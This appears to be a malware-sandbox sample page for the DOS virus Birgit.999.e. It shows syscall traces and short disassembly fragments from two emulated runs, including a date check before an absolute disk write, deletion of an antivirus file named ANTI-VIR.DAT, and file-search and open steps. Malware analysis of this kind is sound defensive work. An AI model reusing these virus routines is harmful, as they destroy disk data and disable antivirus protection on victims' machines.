Sample viewer

vx.netlux.org/Virus.DOS.Birgit.999.e

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:59.365681744Z 42 PC: 12b63 | Get date 0x12b63: cmp dl, 0x12
0x12b66: jne 0x12b6c
0x12b68: mov al, 2
0x12b6a: int 0x26
0x12b6c: popaw
0x12b6d: mov ah, 0x47
0x12b6f: mov dl, 0
0x12b71: lea si, word ptr [bp + 0x344]
0x12b75: int 0x21
0x12b77: call 0x12b7e
0x12b7a: jmp 0x12bab
0x12b7c: add byte ptr [bx + si], al
0x12b7e: pushaw
0x12b7f: mov dx, word ptr ds:[bp + 0x13c]
0x12b84: jmp 0x12b8b
0x12b86: nop
0x12b87: mov ah, 0x4c
0x12b89: int 0x21
0x12b8b: mov cx, 0xae
0x12b8e: lea si, word ptr [bp + 0x16b]
2018-12-17T22:57:59.368466778Z 71 PC: 12b77 | Get current directory
2018-12-17T22:57:59.372139143Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.374189308Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.375953551Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.379457442Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.381377376Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.383425574Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.386037619Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.387875191Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.389672379Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.392306037Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.39410413Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.395766385Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.397735746Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.399858771Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.401506965Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.403505211Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.406379577Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.408342906Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.410349595Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.413269802Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.415350769Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.417401179Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.420350507Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.421969287Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.423826402Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.426734475Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.428415447Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.429958627Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.432064728Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.433784838Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.435409352Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.437563438Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.43940264Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.441186936Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.443609116Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.445514737Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.447227548Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.448958568Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.452128353Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.454229502Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.456294952Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.459314909Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.461017932Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.462673854Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.465124667Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.466892108Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.469024872Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.471343472Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.472963179Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.474924216Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.476783647Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.479417526Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.482122659Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.485132273Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.486861069Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.488604978Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.490527915Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.492696197Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.495075354Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.49699592Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.499407105Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.501421061Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.503425Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.506317828Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.508289976Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.510216755Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.513445869Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.516003685Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.518305361Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.521326213Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.52299063Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.524567322Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.527803785Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.529945407Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.531999704Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.534037256Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.536988651Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.539037274Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.541066693Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.543893372Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.546028569Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.548221506Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.555554382Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.55849089Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.560159701Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.562276369Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.564567239Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.565954202Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.568362306Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.569905782Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.571275114Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.572846095Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.574869939Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.576232758Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.577600874Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.58118133Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.583105246Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.585029094Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.587912121Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.589883384Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.591878944Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.594613046Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.59633406Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.597997018Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.600859585Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.603400372Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.605100685Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.607255048Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.609264114Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.611244909Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.61343368Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.616179538Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.618180195Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.62058141Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.623022407Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.624837448Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.626620107Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.629100187Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.630810735Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.632628266Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.635098989Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.636931598Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.638759579Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.641315163Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.643168362Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.647232392Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.649493552Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.652162609Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.654581554Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.657501635Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.659573564Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.662486379Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.665353503Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.667228615Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.669016648Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.671507516Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.673377774Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.675288663Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.677543604Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.679791047Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.681920552Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.684024177Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.686287266Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.688227871Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.691179114Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.693175277Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.695118841Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.697256551Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.699918181Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.701827274Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.70411991Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.706457807Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.708371222Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.710241152Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.711899995Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.713139723Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.714393057Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.716299001Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.717490904Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.718766178Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.720816946Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.722218892Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.724294631Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.726478867Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.727956285Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.729217944Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.732525602Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.734726086Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.736843644Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.739851197Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.74171373Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.743762763Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.746965992Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.748860177Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-17T22:57:59.750757488Z 250 PC: 12bb5 | UNKNOWN!
2018-12-17T22:57:59.757502788Z 67 PC: 12bee | Get or set file attributes
2018-12-17T22:57:59.765722857Z 65 PC: 12bf2 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-17T22:57:59.772706421Z 44 PC: 12c0e | Get time 0x12c0e: mov word ptr ds:[bp + 0x13c], dx
0x12c13: jmp 0x12c31
0x12c15: mov ah, 0x3b
0x12c17: lea dx, word ptr [bp + 0x394]
0x12c1b: int 0x21
0x12c1d: mov al, byte ptr ds:[bp + 0x397]
0x12c22: cmp byte ptr ds:[bp + 0x397], 3
0x12c28: je 0x12c88
0x12c2a: inc al
0x12c2c: mov byte ptr ds:[bp + 0x397], al
0x12c31: mov ax, 0x4e00
0x12c34: mov cx, 0
0x12c37: lea dx, word ptr [bp + 0x253]
0x12c3b: int 0x21
0x12c3d: jae 0x12c42
0x12c3f: jmp 0x12d45
0x12c42: push 0x4300
0x12c45: pop ax
0x12c46: mov dx, 0x9e
0x12c49: int 0x21
2018-12-17T22:57:59.77671154Z 78 PC: 12c3d | Find first file
2018-12-17T22:57:59.783635309Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T22:57:59.786403157Z 67 PC: 12c58 | Get or set file attributes
2018-12-17T22:57:59.789550082Z 61 PC: 12c60 | Open file (Filename = '')
2018-12-17T22:57:59.792016635Z 63 PC: 12c6f | Read file or device (Read 4 bytes on handle 2)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12736,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:11.267515133Z 42 PC: 12b63 | Get date 0x12b63: cmp dl, 0x12
0x12b66: jne 0x12b6c
0x12b68: mov al, 2
0x12b6a: int 0x26
0x12b6c: popaw
0x12b6d: mov ah, 0x47
0x12b6f: mov dl, 0
0x12b71: lea si, word ptr [bp + 0x344]
0x12b75: int 0x21
0x12b77: call 0x12b7e
0x12b7a: jmp 0x12bab
0x12b7c: add byte ptr [bx + si], al
0x12b7e: pushaw
0x12b7f: mov dx, word ptr ds:[bp + 0x13c]
0x12b84: jmp 0x12b8b
0x12b86: nop
0x12b87: mov ah, 0x4c
0x12b89: int 0x21
0x12b8b: mov cx, 0xae
0x12b8e: lea si, word ptr [bp + 0x16b]
2018-12-25T12:36:11.269658587Z 71 PC: 12b77 | Get current directory
2018-12-25T12:36:11.273489405Z 68 PC: 12ba6 | I/O control for devices (Set for = '')
2018-12-25T12:36:11.275113636Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.276773363Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.279166556Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.280964775Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.282520884Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.284578365Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.285965945Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.287329813Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.289191921Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.290309605Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.29141652Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.292880948Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.294519499Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.29591807Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.298202457Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.300205974Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.302058495Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.303885581Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.306185203Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.308200894Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.310207216Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.312858344Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.314792592Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.31670214Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.319175636Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.321128684Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.323030563Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.336362156Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.344899392Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.346539715Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.352894668Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.354560822Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.356193632Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.362889929Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.364524935Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.366121246Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.367916396Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.37031037Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.37220956Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.37409267Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.37686247Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.378746425Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.380647545Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.38314538Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.384799Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.386386928Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.388767118Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.391483575Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.39306006Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.395101182Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.396791277Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.398435896Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.400389806Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.401993852Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.403458026Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.405791475Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.407706498Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.409275005Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.41135208Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.413019988Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.414933417Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.416318518Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.41929167Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.420974102Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.423228386Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.425308436Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.426913209Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.428460417Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.430812472Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.432806396Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.434803825Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.437218171Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.438997244Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.44071305Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.442717393Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.444416904Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.446319868Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.448808655Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.450520175Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.452214951Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.454227991Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.455760006Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.457256133Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.459332345Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.460973065Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.462423488Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.464098473Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.465843287Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.467204073Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.468758636Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.47035631Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.471742769Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.473179689Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.475458196Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.47707175Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.478737144Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.480246146Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.481482923Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.482531866Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.484506966Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.485564006Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.486631287Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.488326508Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.489409714Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.490551877Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.492141307Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.493317803Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.495540261Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.498260443Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.50064348Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.502093582Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.503897308Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.505483313Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.50697799Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.509300927Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.510927596Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.512436489Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.51405837Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.515977232Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.517451569Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.519076049Z 68 PC: 12ba6 | I/O control for devices (See above)
